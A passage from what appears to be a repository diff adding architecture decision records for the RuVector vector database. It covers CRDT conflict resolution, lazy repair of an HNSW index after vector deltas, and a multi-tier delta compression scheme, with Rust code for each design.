### Option 3: Operational Transform (OT)
**Description**: Transform operations to maintain consistency.
**Pros**:
- Preserves all intentions
- Used successfully in collaborative editing
**Cons**:
- Complex transformation functions
- Hard to prove correctness
- Doesn't map well to vector semantics
**Verdict**: Rejected - CRDT semantics more natural for vectors.
### Option 4: CRDT with Causal Ordering (Selected)
**Description**: CRDT merge with per-dimension version tracking.
**Pros**:
- Automatic convergence
- Semantically meaningful merges
- Flexible strategies
- Proven correctness
**Cons**:
- Per-dimension overhead
- More complex than LWW
**Verdict**: Adopted - optimal balance of correctness and flexibility.
---
## Technical Specification
### Conflict Detection API
```rust
/// Detect conflicts between deltas
pub fn detect_conflicts(
local_delta: &VectorDelta,
remote_delta: &VectorDelta,
) -> ConflictReport {
let mut conflicts = Vec::new();
// Check if targeting same vector
if local_delta.vector_id != remote_delta.vector_id {
return ConflictReport::NoConflict;
}
// Check causality
let ordering = local_delta.clock.compare(&remote_delta.clock);
if ordering != ClockOrdering::Concurrent {
return ConflictReport::Ordered { ordering };
}
// Analyze operation conflicts
let op_conflicts = analyze_operation_conflicts(
&local_delta.operation,
&remote_delta.operation,
);
ConflictReport::Conflicts {
vector_id: local_delta.vector_id.clone(),
local_delta_id: local_delta.delta_id.clone(),
remote_delta_id: remote_delta.delta_id.clone(),
dimension_conflicts: op_conflicts,
}
}
```
### Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ConflictConfig {
/// Default resolution strategy
pub default_strategy: ConflictStrategy,
/// Per-namespace strategies
pub namespace_strategies: HashMap<String, ConflictStrategy>,
/// Per-dimension strategies (dimension index -> strategy)
pub dimension_strategies: HashMap<usize, ConflictStrategy>,
/// Whether to log conflicts
pub log_conflicts: bool,
/// Conflict callback for custom handling
#[serde(skip)]
pub conflict_callback: Option<ConflictCallback>,
/// Tombstone retention duration
pub tombstone_retention: Duration,
}
impl Default for ConflictConfig {
fn default() -> Self {
Self {
default_strategy: ConflictStrategy::LastWriteWins,
namespace_strategies: HashMap::new(),
dimension_strategies: HashMap::new(),
log_conflicts: true,
conflict_callback: None,
tombstone_retention: Duration::from_secs(86400 * 7), // 7 days
}
}
}
```
---
## Consequences
### Benefits
1. **Automatic Convergence**: All replicas converge without coordination
2. **Partition Tolerance**: Works during network partitions
3. **Semantic Merging**: Vector-appropriate conflict resolution
4. **Flexibility**: Configurable per-dimension strategies
5. **Auditability**: All conflicts logged with resolution
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Memory overhead | Medium | Medium | Lazy per-dimension tracking |
| Merge complexity | Low | Medium | Thorough testing, formal verification |
| Strategy misconfiguration | Medium | High | Sensible defaults, validation |
| Tombstone accumulation | Medium | Medium | Garbage collection policies |
---
## References
1. Shapiro, M., et al. "Conflict-free Replicated Data Types." SSS 2011.
2. Kleppmann, M., & Almeida, P. S. "A Conflict-Free Replicated JSON Datatype." IEEE TPDS 2017.
3. Ruvector conflict.rs: Existing conflict resolution implementation
4. ADR-DB-001: Delta Behavior Core Architecture
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-003**: Delta Propagation Protocol
- **ADR-DB-005**: Delta Index Updates

View File

@@ -0,0 +1,762 @@
# ADR-DB-005: Delta Index Updates
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Index Update Challenge
HNSW (Hierarchical Navigable Small World) indexes present unique challenges for delta-based updates:
1. **Graph Structure**: HNSW is a proximity graph where edges connect similar vectors
2. **Insert Complexity**: O(log n * ef_construction) for proper graph maintenance
3. **Update Semantics**: Standard HNSW has no native update operation
4. **Recall Sensitivity**: Graph quality directly impacts search recall
5. **Concurrent Access**: Updates must not corrupt concurrent searches
### Current HNSW Behavior
Ruvector's existing HNSW implementation (ADR-001) uses:
- `hnsw_rs` library for graph operations
- Mark-delete semantics (no graph restructuring)
- Full rebuild for significant changes
- No incremental edge updates
### Delta Update Scenarios
| Scenario | Vector Change | Impact on Neighbors |
|----------|---------------|---------------------|
| Minor adjustment (<5%) | Negligible | Neighbors likely still valid |
| Moderate change (5-20%) | Moderate | Some edges may be suboptimal |
| Major change (>20%) | Significant | Many edges invalidated |
| Dimension shift | Variable | Depends on affected dimensions |
---
## Decision
### Adopt Lazy Repair with Quality Bounds
We implement a **lazy repair** strategy that:
1. Applies deltas immediately to vector data
2. Defers index repair until quality degrades
3. Uses quality bounds to trigger selective repair
4. Maintains search correctness through fallback mechanisms
### Architecture Overview
```
┌─────────────────────────────────────────────────────────────┐
│ DELTA INDEX MANAGER │
└─────────────────────────────────────────────────────────────┘
┌─────────────────┬─────────────────┬┴──────────────────┬─────────────────┐
│ │ │ │ │
v v v v v
┌─────────┐ ┌─────────┐ ┌───────────┐ ┌─────────────┐ ┌─────────┐
│ Delta │ │ Quality │ │ Lazy │ │ Checkpoint │ │ Rebuild │
│ Tracker │ │ Monitor │ │ Repair │ │ Manager │ │ Trigger │
└─────────┘ └─────────┘ └───────────┘ └─────────────┘ └─────────┘
│ │ │ │ │
│ │ │ │ │
v v v v v
┌─────────────────────────────────────────────────────────────────────────────────┐
│ HNSW INDEX LAYER │
│ Vector Data │ Edge Graph │ Entry Points │ Layer Structure │ Distance Cache │
└─────────────────────────────────────────────────────────────────────────────────┘
```
### Core Components
#### 1. Delta Tracker
```rust
/// Tracks pending index updates from deltas
pub struct DeltaTracker {
/// Pending updates by vector ID
pending: DashMap<VectorId, PendingUpdate>,
/// Delta accumulation before index update
delta_buffer: Vec<AccumulatedDelta>,
/// Configuration
config: DeltaTrackerConfig,
}
#[derive(Debug, Clone)]
pub struct PendingUpdate {
/// Original vector (before deltas)
pub original: Vec<f32>,
/// Current vector (after deltas)
pub current: Vec<f32>,
/// Accumulated delta magnitude
pub total_delta_magnitude: f32,
/// Number of deltas accumulated
pub delta_count: u32,
/// First delta timestamp
pub first_delta_at: Instant,
/// Index entry status
pub index_status: IndexStatus,
}
#[derive(Debug, Clone, Copy)]
pub enum IndexStatus {
/// Index matches vector exactly
Synchronized,
/// Index is stale but within bounds
Stale { estimated_quality: f32 },
/// Index needs repair
NeedsRepair,
/// Not yet indexed
NotIndexed,
}
impl DeltaTracker {
/// Record a delta application
pub fn record_delta(
&self,
vector_id: &VectorId,
old_vector: &[f32],
new_vector: &[f32],
) {
let delta_magnitude = compute_l2_delta(old_vector, new_vector);
self.pending
.entry(vector_id.clone())
.and_modify(|update| {
update.current = new_vector.to_vec();
update.total_delta_magnitude += delta_magnitude;
update.delta_count += 1;
update.index_status = self.estimate_status(update);
})
.or_insert_with(|| PendingUpdate {
original: old_vector.to_vec(),
current: new_vector.to_vec(),
total_delta_magnitude: delta_magnitude,
delta_count: 1,
first_delta_at: Instant::now(),
index_status: IndexStatus::Stale {
estimated_quality: self.estimate_quality(delta_magnitude),
},
});
}
/// Get vectors needing repair
pub fn get_repair_candidates(&self) -> Vec<VectorId> {
self.pending
.iter()
.filter(|e| matches!(e.index_status, IndexStatus::NeedsRepair))
.map(|e| e.key().clone())
.collect()
}
fn estimate_status(&self, update: &PendingUpdate) -> IndexStatus {
let relative_change = update.total_delta_magnitude
/ (vector_magnitude(&update.original) + 1e-10);
if relative_change > self.config.repair_threshold {
IndexStatus::NeedsRepair
} else {
IndexStatus::Stale {
estimated_quality: self.estimate_quality(update.total_delta_magnitude),
}
}
}
fn estimate_quality(&self, delta_magnitude: f32) -> f32 {
// Quality decays with delta magnitude
// Based on empirical HNSW edge validity studies
(-delta_magnitude / self.config.quality_decay_constant).exp()
}
}
```
#### 2. Quality Monitor
```rust
/// Monitors index quality and triggers repairs
pub struct QualityMonitor {
/// Sampled quality measurements
measurements: RingBuffer<QualityMeasurement>,
/// Current quality estimate
current_quality: AtomicF32,
/// Quality bounds configuration
bounds: QualityBounds,
/// Repair trigger channel
repair_trigger: Sender<RepairRequest>,
}
#[derive(Debug, Clone, Copy)]
pub struct QualityBounds {
/// Minimum acceptable recall
pub min_recall: f32,
/// Target recall
pub target_recall: f32,
/// Sampling rate (fraction of searches)
pub sample_rate: f32,
/// Number of samples for estimate
pub sample_window: usize,
}
impl Default for QualityBounds {
fn default() -> Self {
Self {
min_recall: 0.90,
target_recall: 0.95,
sample_rate: 0.01, // Sample 1% of searches
sample_window: 1000,
}
}
}
#[derive(Debug, Clone)]
pub struct QualityMeasurement {
/// Estimated recall for this search
pub recall: f32,
/// Number of stale vectors encountered
pub stale_vectors: u32,
/// Timestamp
pub timestamp: Instant,
}
impl QualityMonitor {
/// Sample a search for quality estimation
pub async fn sample_search(
&self,
query: &[f32],
hnsw_results: &[SearchResult],
k: usize,
) -> Option<QualityMeasurement> {
// Only sample based on configured rate
if !self.should_sample() {
return None;
}
// Compute ground truth via exact search on sample
let exact_results = self.exact_search_sample(query, k).await;
// Calculate recall
let hnsw_ids: HashSet<_> = hnsw_results.iter().map(|r| &r.id).collect();
let exact_ids: HashSet<_> = exact_results.iter().map(|r| &r.id).collect();
let overlap = hnsw_ids.intersection(&exact_ids).count();
let recall = overlap as f32 / k as f32;
// Count stale vectors in results
let stale_count = self.count_stale_in_results(hnsw_results);
let measurement = QualityMeasurement {
recall,
stale_vectors: stale_count,
timestamp: Instant::now(),
};
// Update estimates
self.measurements.push(measurement.clone());
self.update_quality_estimate();
// Trigger repair if below bounds
if recall < self.bounds.min_recall {
let _ = self.repair_trigger.send(RepairRequest::QualityBelowBounds {
current_recall: recall,
min_recall: self.bounds.min_recall,
});
}
Some(measurement)
}
fn update_quality_estimate(&self) {
let recent: Vec<_> = self.measurements
.iter()
.rev()
.take(self.bounds.sample_window)
.collect();
if recent.is_empty() {
return;
}
let avg_recall = recent.iter().map(|m| m.recall).sum::<f32>() / recent.len() as f32;
self.current_quality.store(avg_recall, Ordering::Relaxed);
}
}
```
#### 3. Lazy Repair Engine
```rust
/// Performs lazy index repair operations
pub struct LazyRepairEngine {
/// HNSW index reference
hnsw: Arc<RwLock<HnswIndex>>,
/// Delta tracker reference
tracker: Arc<DeltaTracker>,
/// Repair configuration
config: RepairConfig,
/// Background repair task
repair_task: Option<JoinHandle<()>>,
}
#[derive(Debug, Clone)]
pub struct RepairConfig {
/// Maximum repairs per batch
pub batch_size: usize,
/// Repair interval
pub repair_interval: Duration,
/// Whether to use background repair
pub background_repair: bool,
/// Priority ordering for repairs
pub priority: RepairPriority,
}
#[derive(Debug, Clone, Copy)]
pub enum RepairPriority {
/// Repair most changed vectors first
MostChanged,
/// Repair oldest pending first
Oldest,
/// Repair most frequently accessed first
MostAccessed,
/// Round-robin
RoundRobin,
}
impl LazyRepairEngine {
/// Repair a single vector in the index
pub async fn repair_vector(&self, vector_id: &VectorId) -> Result<RepairResult> {
// Get current vector state
let update = self.tracker.pending.get(vector_id)
.ok_or(RepairError::VectorNotPending)?;
let mut hnsw = self.hnsw.write().await;
// Strategy 1: Soft update (if change is small)
if update.total_delta_magnitude < self.config.soft_update_threshold {
return self.soft_update(&mut hnsw, vector_id, &update.current).await;
}
// Strategy 2: Re-insertion (moderate change)
if update.total_delta_magnitude < self.config.reinsert_threshold {
return self.reinsert(&mut hnsw, vector_id, &update.current).await;
}
// Strategy 3: Full repair (large change)
self.full_repair(&mut hnsw, vector_id, &update.current).await
}
/// Soft update: only update vector data, keep edges
async fn soft_update(
&self,
hnsw: &mut HnswIndex,
vector_id: &VectorId,
new_vector: &[f32],
) -> Result<RepairResult> {
// Update vector data without touching graph structure
hnsw.update_vector_data(vector_id, new_vector)?;
// Mark as synchronized
self.tracker.pending.remove(vector_id);
Ok(RepairResult::SoftUpdate {
vector_id: vector_id.clone(),
edges_preserved: true,
})
}
/// Re-insertion: remove and re-add to graph
async fn reinsert(
&self,
hnsw: &mut HnswIndex,
vector_id: &VectorId,
new_vector: &[f32],
) -> Result<RepairResult> {
// Get current index position
let old_idx = hnsw.get_index_for_vector(vector_id)?;
// Mark old position as deleted
hnsw.mark_deleted(old_idx)?;
// Insert with new vector
let new_idx = hnsw.insert_vector(vector_id.clone(), new_vector.to_vec())?;
// Update tracker
self.tracker.pending.remove(vector_id);
Ok(RepairResult::Reinserted {
vector_id: vector_id.clone(),
old_idx,
new_idx,
})
}
/// Full repair: rebuild local neighborhood
async fn full_repair(
&self,
hnsw: &mut HnswIndex,
vector_id: &VectorId,
new_vector: &[f32],
) -> Result<RepairResult> {
// Get current neighbors
let old_neighbors = hnsw.get_neighbors(vector_id)?;
// Remove and reinsert
self.reinsert(hnsw, vector_id, new_vector).await?;
// Repair edges from old neighbors
let repaired_edges = self.repair_neighbor_edges(hnsw, &old_neighbors).await?;
Ok(RepairResult::FullRepair {
vector_id: vector_id.clone(),
repaired_edges,
})
}
/// Background repair loop
pub async fn run_background_repair(&self) {
loop {
tokio::time::sleep(self.config.repair_interval).await;
// Get repair candidates
let candidates = self.tracker.get_repair_candidates();
if candidates.is_empty() {
continue;
}
// Prioritize
let prioritized = self.prioritize_repairs(candidates);
// Repair batch
for vector_id in prioritized.into_iter().take(self.config.batch_size) {
if let Err(e) = self.repair_vector(&vector_id).await {
tracing::warn!("Repair failed for {}: {}", vector_id, e);
}
}
}
}
}
```
### Recall vs Latency Tradeoffs
```
┌──────────────────────────────────────────────────────────┐
│ RECALL vs LATENCY TRADEOFF │
└──────────────────────────────────────────────────────────┘
Recall
100% │ ┌──────────────────┐
│ / │
│ / Immediate Repair │
│ / │
95% │ ┌───────────────────────────●───────────────────────┤
│ / │ │
│ / Lazy Repair │ │
│ / │ │
90% │●───────────────────────────────┤ │
│ │ │
│ Quality Bound │ │
85% │ (Min Acceptable) │ │
│ │ │
└────────────────────────────────┴───────────────────────┴───>
Low Medium High
Write Latency
──── Lazy Repair (Selected): Best balance
- - - Immediate Repair: Highest recall, highest latency
· · · No Repair: Lowest latency, recall degrades
```
### Repair Strategy Selection
```rust
/// Select repair strategy based on delta characteristics
pub fn select_repair_strategy(
delta_magnitude: f32,
vector_norm: f32,
access_frequency: f32,
current_recall: f32,
config: &RepairConfig,
) -> RepairStrategy {
let relative_change = delta_magnitude / (vector_norm + 1e-10);
// High access frequency = repair sooner
let access_weight = if access_frequency > config.hot_vector_threshold {
0.7 // Reduce thresholds for hot vectors
} else {
1.0
};
// Low current recall = repair more aggressively
let recall_weight = if current_recall < config.quality_bounds.min_recall {
0.5 // Halve thresholds when recall is critical
} else {
1.0
};
let effective_threshold = config.soft_update_threshold * access_weight * recall_weight;
if relative_change < effective_threshold {
RepairStrategy::Deferred // No immediate action
} else if relative_change < config.reinsert_threshold * access_weight * recall_weight {
RepairStrategy::SoftUpdate
} else if relative_change < config.full_repair_threshold * access_weight * recall_weight {
RepairStrategy::Reinsert
} else {
RepairStrategy::FullRepair
}
}
```
---
## Recall vs Latency Analysis
### Simulated Workload Results
| Strategy | Write Latency (p50) | Recall@10 | Recall@100 |
|----------|---------------------|-----------|------------|
| Immediate Repair | 2.1ms | 99.2% | 98.7% |
| Lazy (aggressive) | 150us | 96.5% | 95.1% |
| Lazy (balanced) | 80us | 94.2% | 92.8% |
| Lazy (relaxed) | 50us | 91.3% | 89.5% |
| No Repair | 35us | 85.1%* | 82.3%* |
*Degrades over time with update volume
### Quality Degradation Curves
```
Recall over time (1000 updates/sec, no repair):
100% ├────────────
│ \
95% │ \──────────────
│ \
90% │ \────────────
│ \
85% │ \───────
80% │
└─────────────────────────────────────────────────────>
0 5 10 15 20 Minutes
With lazy repair (balanced):
100% ├────────────
│ \ ┌─────┐ ┌─────┐ ┌─────┐
95% │ \───┬┘ └───┬┘ └───┬┘ └───
│ │ Repair │ Repair │ Repair
90% │ │ │ │
85% │
└─────────────────────────────────────────────────────>
0 5 10 15 20 Minutes
```
---
## Considered Options
### Option 1: Immediate Rebuild
**Description**: Rebuild affected portions of graph on every delta.
**Pros**:
- Always accurate graph
- Maximum recall
- Simple correctness model
**Cons**:
- O(log n * ef_construction) per update
- High write latency
- Blocks concurrent searches
**Verdict**: Rejected - latency unacceptable for streaming updates.
### Option 2: Periodic Full Rebuild
**Description**: Allow degradation, rebuild entire index periodically.
**Pros**:
- Minimal write overhead
- Predictable rebuild schedule
- Simple implementation
**Cons**:
- Extended degradation periods
- Expensive rebuilds
- Resource spikes
**Verdict**: Available as configuration option, not default.
### Option 3: Lazy Update (Selected)
**Description**: Defer repairs, trigger on quality bounds.
**Pros**:
- Low write latency
- Bounded recall degradation
- Adaptive to workload
- Background repair
**Cons**:
- Complexity in quality monitoring
- Potential recall dips
**Verdict**: Adopted - optimal balance for delta workloads.
### Option 4: Learned Index Repair
**Description**: ML model predicts optimal repair timing.
**Pros**:
- Potentially optimal decisions
- Adapts to patterns
**Cons**:
- Training complexity
- Model maintenance
- Explainability
**Verdict**: Deferred to future version.
---
## Technical Specification
### Index Update API
```rust
/// Delta-aware HNSW index
#[async_trait]
pub trait DeltaAwareIndex: Send + Sync {
/// Apply delta without immediate index update
async fn apply_delta(&self, delta: &VectorDelta) -> Result<DeltaApplication>;
/// Get current recall estimate
fn current_recall(&self) -> f32;
/// Get vectors pending repair
fn pending_repairs(&self) -> Vec<VectorId>;
/// Force repair of specific vectors
async fn repair_vectors(&self, ids: &[VectorId]) -> Result<Vec<RepairResult>>;
/// Trigger background repair cycle
async fn trigger_repair_cycle(&self) -> Result<RepairCycleSummary>;
/// Search with optional quality sampling
async fn search_with_quality(
&self,
query: &[f32],
k: usize,
sample_quality: bool,
) -> Result<SearchWithQuality>;
}
#[derive(Debug)]
pub struct DeltaApplication {
pub vector_id: VectorId,
pub delta_id: DeltaId,
pub strategy: RepairStrategy,
pub deferred_repair: bool,
pub estimated_recall_impact: f32,
}
#[derive(Debug)]
pub struct SearchWithQuality {
pub results: Vec<SearchResult>,
pub quality_sample: Option<QualityMeasurement>,
pub stale_results: u32,
}
```
### Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DeltaIndexConfig {
/// Quality bounds for triggering repair
pub quality_bounds: QualityBounds,
/// Repair engine configuration
pub repair_config: RepairConfig,
/// Delta tracker configuration
pub tracker_config: DeltaTrackerConfig,
/// Enable background repair
pub background_repair: bool,
/// Checkpoint interval (for recovery)
pub checkpoint_interval: Duration,
}
impl Default for DeltaIndexConfig {
fn default() -> Self {
Self {
quality_bounds: QualityBounds::default(),
repair_config: RepairConfig {
batch_size: 100,
repair_interval: Duration::from_secs(5),
background_repair: true,
priority: RepairPriority::MostChanged,
soft_update_threshold: 0.05, // 5% change
reinsert_threshold: 0.20, // 20% change
full_repair_threshold: 0.50, // 50% change
},
tracker_config: DeltaTrackerConfig {
repair_threshold: 0.15,
quality_decay_constant: 0.1,
},
background_repair: true,
checkpoint_interval: Duration::from_secs(300),
}
}
}
```
---
## Consequences
### Benefits
1. **Low Write Latency**: Sub-millisecond delta application
2. **Bounded Degradation**: Quality monitoring prevents unacceptable recall
3. **Adaptive**: Repairs prioritized by impact and access patterns
4. **Background Processing**: Repairs don't block user operations
5. **Resource Efficient**: Avoids unnecessary graph restructuring
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Recall below bounds | Low | High | Aggressive repair triggers |
| Repair backlog | Medium | Medium | Batch size tuning |
| Stale search results | Medium | Medium | Optional exact fallback |
| Checkpoint overhead | Low | Low | Incremental checkpoints |
---
## References
1. Malkov, Y., & Yashunin, D. "Efficient and robust approximate nearest neighbor search using HNSW graphs."
2. Singh, A., et al. "FreshDiskANN: A Fast and Accurate Graph-Based ANN Index for Streaming Similarity Search."
3. ADR-001: Ruvector Core Architecture
4. ADR-DB-001: Delta Behavior Core Architecture
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-003**: Delta Propagation Protocol
- **ADR-DB-007**: Delta Temporal Windows

View File

@@ -0,0 +1,671 @@
# ADR-DB-006: Delta Compression Strategy
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Compression Challenge
Delta-first architecture generates significant data volume:
- Each delta includes metadata (IDs, clocks, timestamps)
- Delta chains accumulate over time
- Network transmission requires bandwidth
- Storage persists all deltas for history
### Compression Opportunities
| Data Type | Characteristics | Compression Potential |
|-----------|-----------------|----------------------|
| Delta values (f32) | Smooth distributions | 2-4x with quantization |
| Indices (u32) | Sparse, sorted | 3-5x with delta+varint |
| Metadata | Repetitive strings | 5-10x with dictionary |
| Batches | Similar patterns | 10-50x with deduplication |
### Requirements
1. **Speed**: Compression/decompression < 1ms for typical deltas
2. **Ratio**: >3x compression for storage, >5x for network
3. **Streaming**: Support for streaming compression/decompression
4. **Lossless Option**: Must support exact reconstruction
5. **WASM Compatible**: Must work in browser environment
---
## Decision
### Adopt Multi-Tier Compression Strategy
We implement a tiered compression system that adapts to data characteristics and use case requirements.
### Compression Tiers
```
┌─────────────────────────────────────────────────────────────┐
│ COMPRESSION TIER SELECTION │
└─────────────────────────────────────────────────────────────┘
Input Delta
v
┌─────────────────────────────────────────────────────────────┐
│ TIER 0: ENCODING │
│ Format selection (Sparse/Dense/RLE/Dict) │
│ Typical: 1-10x compression, <10us │
└─────────────────────────────────────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────┐
│ TIER 1: VALUE COMPRESSION │
│ Quantization (f32 -> f16/i8/i4) │
│ Typical: 2-8x compression, <50us │
└─────────────────────────────────────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────┐
│ TIER 2: ENTROPY CODING │
│ LZ4 (fast) / Zstd (balanced) / Brotli (max) │
│ Typical: 1.5-3x additional, 10us-1ms │
└─────────────────────────────────────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────┐
│ TIER 3: BATCH COMPRESSION │
│ Dictionary, deduplication, delta-of-deltas │
│ Typical: 2-10x additional for batches │
└─────────────────────────────────────────────────────────────┘
```
### Tier 0: Encoding Layer
See ADR-DB-002 for format selection. This tier handles:
- Sparse vs Dense vs RLE vs Dictionary encoding
- Index delta-encoding
- Varint encoding for integers
### Tier 1: Value Compression
```rust
/// Value quantization for delta compression
#[derive(Debug, Clone, Copy, Serialize, Deserialize)]
pub enum QuantizationLevel {
/// No quantization (f32)
None,
/// Half precision (f16)
Float16,
/// 8-bit scaled integers
Int8 { scale: f32, offset: f32 },
/// 4-bit scaled integers
Int4 { scale: f32, offset: f32 },
/// Binary (sign only)
Binary,
}
/// Quantize delta values
pub fn quantize_values(
values: &[f32],
level: QuantizationLevel,
) -> QuantizedValues {
match level {
QuantizationLevel::None => {
QuantizedValues::Float32(values.to_vec())
}
QuantizationLevel::Float16 => {
let quantized: Vec<u16> = values.iter()
.map(|&v| half::f16::from_f32(v).to_bits())
.collect();
QuantizedValues::Float16(quantized)
}
QuantizationLevel::Int8 { scale, offset } => {
let quantized: Vec<i8> = values.iter()
.map(|&v| ((v - offset) / scale).round().clamp(-128.0, 127.0) as i8)
.collect();
QuantizedValues::Int8 {
values: quantized,
scale,
offset,
}
}
QuantizationLevel::Int4 { scale, offset } => {
// Pack two 4-bit values per byte
let packed: Vec<u8> = values.chunks(2)
.map(|chunk| {
let v0 = ((chunk[0] - offset) / scale).round().clamp(-8.0, 7.0) as i8;
let v1 = chunk.get(1)
.map(|&v| ((v - offset) / scale).round().clamp(-8.0, 7.0) as i8)
.unwrap_or(0);
((v0 as u8 & 0x0F) << 4) | (v1 as u8 & 0x0F)
})
.collect();
QuantizedValues::Int4 {
packed,
count: values.len(),
scale,
offset,
}
}
QuantizationLevel::Binary => {
// Pack 8 signs per byte
let packed: Vec<u8> = values.chunks(8)
.map(|chunk| {
chunk.iter().enumerate().fold(0u8, |acc, (i, &v)| {
if v >= 0.0 {
acc | (1 << i)
} else {
acc
}
})
})
.collect();
QuantizedValues::Binary {
packed,
count: values.len(),
}
}
}
}
/// Adaptive quantization based on value distribution
pub fn select_quantization(values: &[f32], config: &QuantizationConfig) -> QuantizationLevel {
// Compute statistics
let min = values.iter().cloned().fold(f32::INFINITY, f32::min);
let max = values.iter().cloned().fold(f32::NEG_INFINITY, f32::max);
let range = max - min;
// Check if values are clustered enough for aggressive quantization
let variance = compute_variance(values);
let coefficient_of_variation = variance.sqrt() / (values.iter().sum::<f32>() / values.len() as f32).abs();
if config.allow_lossy {
if coefficient_of_variation < 0.01 {
// Very uniform - use binary
return QuantizationLevel::Binary;
} else if range < 0.1 {
// Small range - use int4
return QuantizationLevel::Int4 {
scale: range / 15.0,
offset: min,
};
} else if range < 2.0 {
// Medium range - use int8
return QuantizationLevel::Int8 {
scale: range / 255.0,
offset: min,
};
} else {
// Large range - use float16
return QuantizationLevel::Float16;
}
}
QuantizationLevel::None
}
```
### Tier 2: Entropy Coding
```rust
/// Entropy compression with algorithm selection
#[derive(Debug, Clone, Copy, Serialize, Deserialize)]
pub enum EntropyCodec {
/// No entropy coding
None,
/// LZ4: Fastest, moderate compression
Lz4 { level: i32 },
/// Zstd: Balanced speed/compression
Zstd { level: i32 },
/// Brotli: Maximum compression (for cold storage)
Brotli { level: u32 },
}
impl EntropyCodec {
/// Compress data
pub fn compress(&self, data: &[u8]) -> Result<Vec<u8>> {
match self {
EntropyCodec::None => Ok(data.to_vec()),
EntropyCodec::Lz4 { level } => {
let mut encoder = lz4_flex::frame::FrameEncoder::new(Vec::new());
encoder.write_all(data)?;
Ok(encoder.finish()?)
}
EntropyCodec::Zstd { level } => {
Ok(zstd::encode_all(data, *level)?)
}
EntropyCodec::Brotli { level } => {
let mut output = Vec::new();
let mut params = brotli::enc::BrotliEncoderParams::default();
params.quality = *level as i32;
brotli::BrotliCompress(&mut data.as_ref(), &mut output, &params)?;
Ok(output)
}
}
}
/// Decompress data
pub fn decompress(&self, data: &[u8]) -> Result<Vec<u8>> {
match self {
EntropyCodec::None => Ok(data.to_vec()),
EntropyCodec::Lz4 { .. } => {
let mut decoder = lz4_flex::frame::FrameDecoder::new(data);
let mut output = Vec::new();
decoder.read_to_end(&mut output)?;
Ok(output)
}
EntropyCodec::Zstd { .. } => {
Ok(zstd::decode_all(data)?)
}
EntropyCodec::Brotli { .. } => {
let mut output = Vec::new();
brotli::BrotliDecompress(&mut data.as_ref(), &mut output)?;
Ok(output)
}
}
}
}
/// Select optimal entropy codec based on requirements
pub fn select_entropy_codec(
size: usize,
latency_budget: Duration,
use_case: CompressionUseCase,
) -> EntropyCodec {
match use_case {
CompressionUseCase::RealTimeNetwork => {
// Prioritize speed
if size < 1024 {
EntropyCodec::None // Overhead not worth it
} else {
EntropyCodec::Lz4 { level: 1 }
}
}
CompressionUseCase::BatchNetwork => {
// Balance speed and compression
EntropyCodec::Zstd { level: 3 }
}
CompressionUseCase::HotStorage => {
// Fast decompression
EntropyCodec::Lz4 { level: 9 }
}
CompressionUseCase::ColdStorage => {
// Maximum compression
EntropyCodec::Brotli { level: 6 }
}
CompressionUseCase::Archive => {
// Maximum compression, slow is OK
EntropyCodec::Brotli { level: 11 }
}
}
}
```
### Tier 3: Batch Compression
```rust
/// Batch-level compression optimizations
pub struct BatchCompressor {
/// Shared dictionary for string compression
string_dict: DeltaDictionary,
/// Value pattern dictionary
value_patterns: PatternDictionary,
/// Deduplication table
dedup_table: DashMap<DeltaHash, DeltaId>,
/// Configuration
config: BatchCompressionConfig,
}
impl BatchCompressor {
/// Compress a batch of deltas
pub fn compress_batch(&self, deltas: &[VectorDelta]) -> Result<CompressedBatch> {
// Step 1: Deduplication
let (unique_deltas, dedup_refs) = self.deduplicate(deltas);
// Step 2: Extract common patterns
let patterns = self.extract_patterns(&unique_deltas);
// Step 3: Build batch-specific dictionary
let batch_dict = self.build_batch_dictionary(&unique_deltas);
// Step 4: Encode deltas using patterns and dictionary
let encoded: Vec<_> = unique_deltas.iter()
.map(|d| self.encode_with_context(d, &patterns, &batch_dict))
.collect();
// Step 5: Pack into batch format
let packed = self.pack_batch(&encoded, &patterns, &batch_dict, &dedup_refs);
// Step 6: Apply entropy coding
let compressed = self.config.entropy_codec.compress(&packed)?;
Ok(CompressedBatch {
compressed_data: compressed,
original_count: deltas.len(),
unique_count: unique_deltas.len(),
compression_ratio: deltas.len() as f32 * std::mem::size_of::<VectorDelta>() as f32
/ compressed.len() as f32,
})
}
/// Deduplicate deltas (same vector, same operation)
fn deduplicate(&self, deltas: &[VectorDelta]) -> (Vec<VectorDelta>, Vec<DedupRef>) {
let mut unique = Vec::new();
let mut refs = Vec::new();
for delta in deltas {
let hash = compute_delta_hash(delta);
if let Some(existing_id) = self.dedup_table.get(&hash) {
refs.push(DedupRef::Existing(*existing_id));
} else {
self.dedup_table.insert(hash, delta.delta_id.clone());
refs.push(DedupRef::New(unique.len()));
unique.push(delta.clone());
}
}
(unique, refs)
}
/// Extract common patterns from deltas
fn extract_patterns(&self, deltas: &[VectorDelta]) -> Vec<DeltaPattern> {
// Find common index sets
let mut index_freq: HashMap<Vec<u32>, u32> = HashMap::new();
for delta in deltas {
if let DeltaOperation::Sparse { indices, .. } = &delta.operation {
*index_freq.entry(indices.clone()).or_insert(0) += 1;
}
}
// Patterns that appear > threshold times
index_freq.into_iter()
.filter(|(_, count)| *count >= self.config.pattern_threshold)
.map(|(indices, count)| DeltaPattern {
indices,
frequency: count,
})
.collect()
}
}
```
---
## Compression Ratios and Speed
### Single Delta Compression
| Configuration | Ratio | Compress Time | Decompress Time |
|---------------|-------|---------------|-----------------|
